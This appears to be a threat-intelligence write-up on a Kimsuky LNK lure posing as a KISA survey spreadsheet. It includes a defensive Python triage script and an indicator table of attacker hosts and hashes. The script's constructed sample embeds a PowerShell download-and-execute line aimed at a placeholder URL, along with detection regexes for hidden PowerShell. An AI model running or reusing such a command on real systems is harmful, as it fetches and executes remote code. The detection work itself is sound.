Kimsuky malware impersonating the Korea Internet & Security Agency (KISA): 현황조사표.xlsx.lnk (2023.8.11)
2023-08-22 • Sakai • Kimsuky Malware impersonating Korea Internet & Security Agency (KISA) - Status Survey.xlsx.lnk (2023.8.11)
The source analyzes a Kimsuky LNK sample disguised as a Korea Internet & Security Agency (KISA) status-survey spreadsheet. The .lnk is not an Excel document: its target is a hidden PowerShell command chain. That chain carves a decoy 현황조사표.xlsx and a batch file out of byte ranges embedded in the LNK file itself, opens the decoy so the victim sees a real spreadsheet, and runs PMmVvG56FLC9y.bat through the 32-bit SysWOW64 cmd.exe. The batch file copies itself into the user profile, registers a RunOnce registry entry for persistence, decodes a hex-encoded PowerShell payload, and beacons to attacker infrastructure including 75.119.136.207 and bian0151.cafe24.com. The report gives hashes for the LNK and the BAT payload, which support detection of Kimsuky's document-lure execution and persistence tradecraft.
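The two traits described above (a LNK whose arguments are a PowerShell chain, and a payload appended after the LNK structures so it can be carved out by byte range) are both visible statically. The following triage script is an added example, not code from the report or from the analyzed sample: it walks the ShellLink header and StringData per MS-SHLLINK, measures how many bytes trail the last parsed structure (the "overlay" where a decoy and a batch file would sit), flags PowerShell/cmd indicators in the arguments, and decodes any hex-encoded blob it finds. The sample LNK, arguments, hex payload and `example.invalid` URL are all constructed for the demonstration; the heuristic terms are generic and not taken from the sample.

```python
"""Static triage of LNK lures that carry appended payloads (added example).

Parses the ShellLink header and StringData (MS-SHLLINK), reports the overlay
left after the last structure, and flags PowerShell/cmd indicators and
hex-encoded blobs in the command-line arguments. All sample data is constructed.
"""
import re
import struct

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
# LinkFlags bits (MS-SHLLINK 2.1.1) that decide which optional structures follow the header
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))

# Generic lure indicators (not taken from the sample): hidden PowerShell, encoded
# commands, self-reading of the LNK to carve embedded byte ranges, 32-bit cmd.
SUSPICIOUS = re.compile(r"powershell|-enc\w*|-w\s+hidden|frombase64string|"
                        r"cmd(?:\.exe)?\s+/c|syswow64|readallbytes", re.I)
HEX_BLOB = re.compile(r"(?:[0-9a-fA-F]{2}){16,}")        # 32 or more hex digits in a row
IOC = re.compile(r"https?://[^\s'\"]+|\b(?:\d{1,3}\.){3}\d{1,3}\b")


def _read_string(data, off, unicode):
    """One StringData field: u16 CountCharacters followed by the characters."""
    if off + 2 > len(data):
        raise ValueError("truncated StringData")
    count = struct.unpack_from("<H", data, off)[0]
    width = 2 if unicode else 1
    raw = data[off + 2: off + 2 + count * width]
    text = raw.decode("utf-16-le" if unicode else "cp1252", "replace")
    return text, off + 2 + count * width


def decode_hex_payload(blob):
    """Hex-encoded script text: UTF-16LE if every other byte is NUL, else UTF-8."""
    raw = bytes.fromhex(blob)
    if len(raw) >= 4 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", "replace")
    return raw.decode("utf-8", "replace")


def triage_lnk(data):
    """Return parsed strings, overlay size, heuristic hits and IoCs for one LNK."""
    if (len(data) < LNK_HEADER_SIZE or data[:4] != struct.pack("<I", LNK_HEADER_SIZE)
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a ShellLink file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:                 # u16 IDListSize, then the IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                           # u32 LinkInfoSize covers the whole block
        off += struct.unpack_from("<I", data, off)[0]
    strings = {}
    for bit, name in STRING_FIELDS:
        if flags & bit:
            strings[name], off = _read_string(data, off, bool(flags & IS_UNICODE))
    while off + 4 <= len(data):                         # ExtraData blocks end with a size < 4
        size = struct.unpack_from("<I", data, off)[0]
        off += 4 if size < 4 else size
        if size < 4:
            break
    args = strings.get("arguments", "")
    decoded = [decode_hex_payload(b) for b in HEX_BLOB.findall(args)]
    return {
        "strings": strings,
        "overlay_bytes": max(len(data) - off, 0),       # bytes after the last structure
        "suspicious": sorted({m.lower() for m in SUSPICIOUS.findall(args)}),
        "decoded_payloads": decoded,
        "iocs": sorted(set(IOC.findall(args + "\n" + "\n".join(decoded)))),
    }


def build_sample_lnk(args, overlay):
    """Constructed minimal LNK: header, one COMMAND_LINE_ARGUMENTS string, TerminalBlock, overlay."""
    header = struct.pack("<I16sIIQQQIiIHHII", LNK_HEADER_SIZE, LNK_CLSID,
                         HAS_ARGUMENTS | IS_UNICODE, 0x20, 0, 0, 0, 0, 0, 7, 0, 0, 0, 0)
    string_data = struct.pack("<H", len(args)) + args.encode("utf-16-le")
    return header + string_data + struct.pack("<I", 0) + overlay


# Constructed stand-ins modelled on the described chain (decoy carved from the LNK's
# own bytes, hex-encoded second stage); the URL uses the reserved .invalid TLD.
CONSTRUCTED_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
CONSTRUCTED_ARGS = ('/c powershell -w hidden -c "$b=[IO.File]::ReadAllBytes(\'survey.xlsx.lnk\');'
                    '[IO.File]::WriteAllBytes(\'decoy.xlsx\',$b[1000..2999]);'
                    '$h=\'' + CONSTRUCTED_PAYLOAD.encode().hex() + '\';'
                    'IEX([Text.Encoding]::UTF8.GetString([byte[]]-split($h -replace \'..\',\'0x$& \')))"')
CONSTRUCTED_OVERLAY = b"PK\x03\x04" + b"\x00" * 2000 + b"@echo off\r\ncopy %~f0 %USERPROFILE%\\\r\n"

if __name__ == "__main__":
    report = triage_lnk(build_sample_lnk(CONSTRUCTED_ARGS, CONSTRUCTED_OVERLAY))
    for key, value in report.items():
        print(f"{key}: {value}")
```

For real files, replace `build_sample_lnk(...)` with `open(path, "rb").read()`; a non-zero `overlay_bytes` on a LNK whose arguments also reference reading its own bytes is the combination worth escalating, since a legitimate shortcut has nothing after its TerminalBlock.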
Indicators of Compromise
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| HASH | 0eb8db3cbde470407f942fd63afe42b8 | 2023-08-22 | 2023-09-06 |
| HASH | 2d444b6f72c8327d1d155faa2cca7fd7 | 2023-08-22 | 2023-09-06 |
| URL | http://bian0151.cafe24.com/admi… | 2023-08-22 | 2023-09-06 |
| DOMAIN | bian0151.cafe24.com | 2023-08-22 | 2023-09-06 |
| IPv4 | 75.119.136.207 | 2023-07-11 | 2023-09-06 |
| HASH | 66165dfb784cbcb442e4767f0ca4f469 | 2023-08-22 | 2023-08-30 |
| HASH | b93c13204acb4819c7688f847b1470a… | 2023-08-22 | 2023-08-22 |
| HASH | a39831ecbe0792adf87f63fb9955735… | 2023-08-22 | 2023-08-22 |
| HASH | d9144b0da0d1ea7671667ffcd854484… | 2023-08-22 | 2023-08-22 |
| HASH | ebd20c8c63690965267c97348f4db89… | 2023-08-22 | 2023-08-22 |